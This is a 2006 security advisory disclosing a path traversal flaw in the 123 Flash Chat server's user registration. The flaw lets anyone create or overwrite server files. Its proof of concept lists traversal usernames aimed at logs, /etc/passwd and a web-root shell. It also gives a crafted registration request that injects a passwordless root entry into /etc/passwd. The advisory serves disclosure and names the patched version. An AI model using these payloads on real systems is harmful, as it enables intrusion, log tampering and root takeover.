ISAA-2006-001.txt

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2006-001  
- Original release date: January 09, 2006  
- Last revised: January 13, 2006  
- Discovered by: Jesus Olmos Gonzalez  
- Severity: 4/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Arbitrary remote file creation in 123flashchat server.  
  
II. BACKGROUND  
-------------------------  
123 Flash Chat is a full featured java chat server and flash chat  
client, the product homepage is www.123flashchat.com and it is  
possible to test it at:  
  
http://host10.123flaschat.com/123flaschat.swf  
http://www.123flashchat.com/123flashchat.swf  
  
  
III. DESCRIPTION  
-------------------------  
The chat server has a user-register functionality, that can be enabled  
by the following sentence:  
  
<enable-user-register>On</enable-user-register>  
  
in /server/etc/groups/default.xml  
  
By default it is enabled and anybody can create a chat account.  
  
  
The register form ask the following questions:  
username, password, repeat-password and email.  
  
When a user creates an account, a file is created at members directory:  
  
/123flashchat/server/data/default/members/isec-user  
  
The user file has the following structure:  
^@^B^@^<username>^@^V<password>^@^E<email>  
or  
^@^B^@^<username>^@^V<password>^@^@  
  
allow  
field size null parse example  
username 32 no (allow transversal ../) ../room_1.txt  
password 32 no allow all 123  
repeat-pass 32 no allow all 123  
email 128 yes /^.+@.+\..+$/aa [email protected]  
  
  
Username field allow anybody to create a file in our system, with same  
priviledges as the server and almost arbitrary content.  
  
This is dangerous becouse, a user can get others account, erase logs,  
modify the server's /etc/passwd or modify other config files.  
  
  
IV. PROOF OF CONCEPT  
-------------------------  
In the exploitation, there are two factors, WHERE and WHAT.  
The username vector is WHERE, and WHAT can be:  
1) password  
2) email address if we need more bytes  
  
  
Possible attacs:  
  
  
../../../../logs/access.log erase logs.  
../../../../logs/error.log erase logs.  
../default/logs/access.log erase logs.  
../members/parker change parker's password, if now we  
login with parker user, he will be  
disconected.  
  
../../../../../../../etc/passwd if server run as root.  
../../../../etc/ssh/sshd.conf if server run as root.  
../../../../../var/log/messages if server run as root.  
../../../../var/www/htdocs/x.php try to build a shell.  
../../../etc/groups/default.xml create an admin account by or other  
config settings.  
../../../fcserver.sh try to replace the script.  
  
etc.  
  
It is possible to replace the existent files, to make a DoS, to erase  
logs, to create/change system accounts, to get other chat user/admin  
accounts or to make other effects in server's system.  
  
*Possible* remote execution if some config file is modified.  
  
Is it possible to hijack and modify the raw command, to inyect line  
feed (0x0a) or other characters to construct arbitrary content of the  
created/overwrited file.  
  
Example:  
  
<?xml version="1.0" encoding="UTF-8"?>  
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"  
user="../../../../../../../etc/passwd" />(0x0a)  
  
/etc/passwd will be:  
  
\0\2\0\3../../../../../../../etc/passwd\0\3  
root::0:0:root:/bin/bash  
\0\0  
  
If the server is Windows, is it possible to get execution.  
  
  
V. BUSINESS IMPACT  
-------------------------  
The chat service can be crashed or compromissed remotelly.  
  
  
VI. SYSTEMS AFFECTED  
-------------------------  
This vulnerability affects the 123flaschat server up to 5.1 (released  
on Dec 22, 2005)  
  
tested at:  
123flaschat server 5.1  
123flaschat server 5.0  
  
  
VII. SOLUTION  
-------------------------  
The vendor released the 5.1_2 version.  
  
http://www.123flashchat.com/flash-chat-server-v512.html  
  
  
VIII. REFERENCES  
-------------------------  
-  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported by Jesus Olmos  
Gonzalez (jolmos=at=isecauditors=dot=com).  
  
  
X. REVISION HISTORY  
-------------------------  
January 09, 2006: Initial release.  
January 13, 2006: Vendor response actualization.  
  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
January 04, 2006 The vulnerability discovered by Internet Security  
Auditors (http://www.isecauditors.com)  
January 09, 2006 Initial vendor notification sent.  
January 10, 2006 Quick response, Version 5.1_2 was released.  
  
XII. LEGAL NOTICES  
-------------------------  
-  
`